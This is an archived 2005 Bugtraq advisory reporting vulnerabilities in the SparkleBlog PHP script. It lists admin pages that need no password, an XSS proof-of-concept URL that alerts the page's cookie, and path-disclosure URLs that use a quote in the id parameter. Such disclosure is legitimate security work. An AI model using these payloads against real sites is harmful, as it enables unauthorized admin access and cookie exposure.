Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Exploit World
Advertising
About/Contact
Credits
Sponsors:



Bugtraq: Various Vulnerabilities in SparkleBlog

Various Vulnerabilities in SparkleBlog

From: Kovács László <bugtracklist_at_freemail.hu>
Date: Sat, 15 Jan 2005 18:00:25 +0100

Various Vulnerabilities in SparkleBlog

SparkleBlog is an open-source PHP script which allows you to input and edit
your weblog entries, without having to go through the hassle of coding in
HTML and uploading via FTP every time you want to make an update.  A weblog
(aka blog) is simply an online version of a diary, and blogging has become
very popular in recent years.  The time and date is automatically added to
the end of each of your blog entries, so people know exactly when you posted
them.  The script even allows your website's visitors to make comments on
each of your blog entries, if they wish.

No password requied for admin pages. So a remote attacker can request the
file and admin the blog site.

[blogsite]/admin/blogadmin.php
[blogsite]/admin/cpconfig.php
[blogsite]/admin/editentries.php
[blogsite]/admin/update.php

XSS attack in journal.php:

[blogsite]/journal.php?id=document.write(unescape(%22%3CSCRIPT%3Ealert(docum
ent.domain);%3C/SCRIPT%3E%3CSCRIPT%3Ealert(document.cookie);%3C/SCRIPT%3E%22
));

Path disclosure in journal.php:

[blogsite]/blog/journal.php?id='

Path disclosure in archives.php:

[blogsite]/blog/archives.php?id='

No respone from vendor since: 2005.01.01.

SparkleBlog's web page: http://www.creamed-coconut.org/sparkleblog.php

Regards,

Kovács László
kovacs.laszlo_at_metalogique.hu
Received on Jan 15 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]